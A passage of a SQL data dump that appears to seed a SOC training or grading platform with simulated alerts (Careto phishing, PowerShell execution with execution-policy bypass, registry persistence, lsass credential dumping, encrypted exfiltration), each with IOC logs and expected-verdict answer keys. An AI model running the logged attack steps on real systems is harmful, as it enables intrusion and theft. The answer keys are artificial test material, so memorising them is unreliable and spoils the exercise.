exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encrypted\\\":true,\\\"file_hash\\\":\\\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\\\",\\\"filename\\\":\\\"ICS_config_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encrypted\\\":true,\\\"file_hash\\\":\\\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\\\",\\\"filename\\\":\\\"ICS_config_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encrypted\\\":true,\\\"file_hash\\\":\\\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\\\",\\\"filename\\\":\\\"ICS_config_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encrypted\\\":true,\\\"file_hash\\\":\\\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\\\",\\\"filename\\\":\\\"ICS_config_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encrypted\\\":true,\\\"file_hash\\\":\\\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\\\",\\\"filename\\\":\\\"ICS_config_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1081, 'Spear-Phishing Email with Malicious Attachment', 'high', 'Email Gateway Logs', 'An expertly crafted spear-phishing email was detected targeting key personnel. The email contained a malicious attachment designed to deploy the Careto malware, aiming to compromise user credentials and establish a foothold.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:26:35Z\",\"email_id\":\"b4f3c2d5-163e-4d8c-a5b0-2a5b0f2d7c43\",\"sender\":\"phisher@example.com\",\"recipient\":\"john.doe@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"Invoice_2023.pdf\",\"hash\":\"a6f5d7b8c9d10e11f13b14a15c16d17e\",\"type\":\"application/pdf\"},\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.10.15\",\"malware_detected\":\"Careto\",\"analysis\":{\"verdict\":\"malicious\",\"description\":\"The attachment contains macros that deploy Careto malware.\"}}', '2026-01-24 03:40:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing email address associated with multiple campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address involved in previous phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a6f5d7b8c9d10e11f13b14a15c16d17e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known variant of Careto malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing 
campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear-Phishing Email with Malicious Attachment\",\"date\":\"2026-02-01T20:32:22.788Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1082, 'Execution of Malicious Script', 'high', 'Endpoint Detection and Response (EDR) Systems', 'A malicious script was executed on the host system, facilitating the deployment of the Careto malware. This operation aims to gain control and extract sensitive information from the compromised machine.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:23:45Z\",\"event_id\":4624,\"log_source\":\"EDR\",\"host\":\"COMPROMISED-HOST\",\"user\":\"john.doe\",\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\",\"file_name\":\"careto_deploy.ps1\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"process\":{\"name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\john.doe\\\\careto_deploy.ps1\"}}', '2026-01-24 03:40:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public IP\",\"verdict\":\"malicious\",\"details\":\"External IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of the Careto malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"careto_deploy.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Filename used to deploy Careto malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active 
Directory\",\"verdict\":\"clean\",\"details\":\"User account related to the execution of the script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1083, 'Establishment of Persistence Mechanisms', 'high', 'Windows Registry and Scheduled Tasks Logs', 'The malware modifies registry keys and creates scheduled tasks to maintain persistence on the compromised networks. This activity indicates an attempt to ensure long-term access to the compromised systems by altering critical system configurations.', 'Persistence', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:33Z\",\"event_id\":7045,\"event_source\":\"Microsoft-Windows-TaskScheduler\",\"computer_name\":\"compromised-host.local\",\"user\":\"SYSTEM\",\"task_name\":\"\\\\ScheduledTask\\\\MaliciousTask\",\"task_content\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c C:\\\\malware\\\\persistence.exe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Persistence\",\"registry_value\":\"C:\\\\malware\\\\persistence.exe\",\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\",\"hash\":\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\",\"username\":\"admin\"}', '2026-01-24 03:40:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known persistence malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.791Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\ScheduledTask\\\\\\\\MaliciousTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Persistence\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.791Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\ScheduledTask\\\\\\\\MaliciousTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c 
C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Persistence\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.791Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\ScheduledTask\\\\\\\\MaliciousTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Persistence\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.791Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\ScheduledTask\\\\\\\\MaliciousTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c 
C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Persistence\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.791Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\ScheduledTask\\\\\\\\MaliciousTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Persistence\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\\\",\\\"username\\\":\\\"admin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1084, 'Credential Dumping for Lateral Movement', 'high', 'Network Traffic Analysis and SIEM', 'Using stolen credentials, the threat actors move laterally across the network, targeting critical systems and expanding their reach. The attacker accessed sensitive systems using harvested credentials.', 'Lateral Movement', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:32:17Z\",\"event_id\":\"10002\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.10.5.23\",\"event_type\":\"credential_access\",\"username\":\"jdoe_admin\",\"file_accessed\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"procdump.exe\",\"action\":\"credential_dump\",\"network_protocol\":\"SMB\",\"destination_port\":445}', '2026-01-24 03:40:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT actor IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"Unusual access pattern detected.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"procdump.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Potential misuse of legitimate 
tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1085, 'Data Exfiltration via Encrypted Channels', 'critical', 'Data Loss Prevention (DLP) Systems', 'The Mask uses encrypted channels to exfiltrate sensitive data from targeted organizations, aiming to avoid detection and complete their espionage mission.', 'Exfiltration', 'T1048.003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-04T13:45:32Z\",\"event_id\":\"EXFIL-2023-3421\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.15\",\"protocol\":\"HTTPS\",\"filename\":\"confidential_report.pdf\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"jdoe\",\"action\":\"File Transfer\",\"detection_module\":\"EncryptedChannelMonitor\",\"alert\":\"Suspicious exfiltration detected via encrypted channel\",\"extra_info\":{\"encryption_type\":\"TLS 1.3\",\"data_volume\":\"5MB\",\"destination_domain\":\"malicious-actor.xyz\"}}', '2026-01-24 03:40:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP is from an internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Monitoring\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash is not associated with known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP System\",\"verdict\":\"sensitive\",\"details\":\"File contains sensitive information.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User 
Directory\",\"verdict\":\"internal\",\"details\":\"Employee account used in data exfiltration.\"}},{\"id\":\"artifact_6\",\"type\":\"domain\",\"value\":\"malicious-actor.xyz\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Domain is associated with known threat actors.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.794Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T13:45:32Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-3421\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_module\\\":\\\"EncryptedChannelMonitor\\\",\\\"alert\\\":\\\"Suspicious exfiltration detected via encrypted channel\\\",\\\"extra_info\\\":{\\\"encryption_type\\\":\\\"TLS 1.3\\\",\\\"data_volume\\\":\\\"5MB\\\",\\\"destination_domain\\\":\\\"malicious-actor.xyz\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.794Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T13:45:32Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-3421\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_module\\\":\\\"EncryptedChannelMonitor\\\",\\\"alert\\\":\\\"Suspicious exfiltration detected via encrypted channel\\\",\\\"extra_info\\\":{\\\"encryption_type\\\":\\\"TLS 1.3\\\",\\\"data_volume\\\":\\\"5MB\\\",\\\"destination_domain\\\":\\\"malicious-actor.xyz\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.794Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T13:45:32Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-3421\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_module\\\":\\\"EncryptedChannelMonitor\\\",\\\"alert\\\":\\\"Suspicious exfiltration detected via encrypted channel\\\",\\\"extra_info\\\":{\\\"encryption_type\\\":\\\"TLS 1.3\\\",\\\"data_volume\\\":\\\"5MB\\\",\\\"destination_domain\\\":\\\"malicious-actor.xyz\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.794Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T13:45:32Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-3421\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_module\\\":\\\"EncryptedChannelMonitor\\\",\\\"alert\\\":\\\"Suspicious exfiltration detected via encrypted channel\\\",\\\"extra_info\\\":{\\\"encryption_type\\\":\\\"TLS 1.3\\\",\\\"data_volume\\\":\\\"5MB\\\",\\\"destination_domain\\\":\\\"malicious-actor.xyz\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.794Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 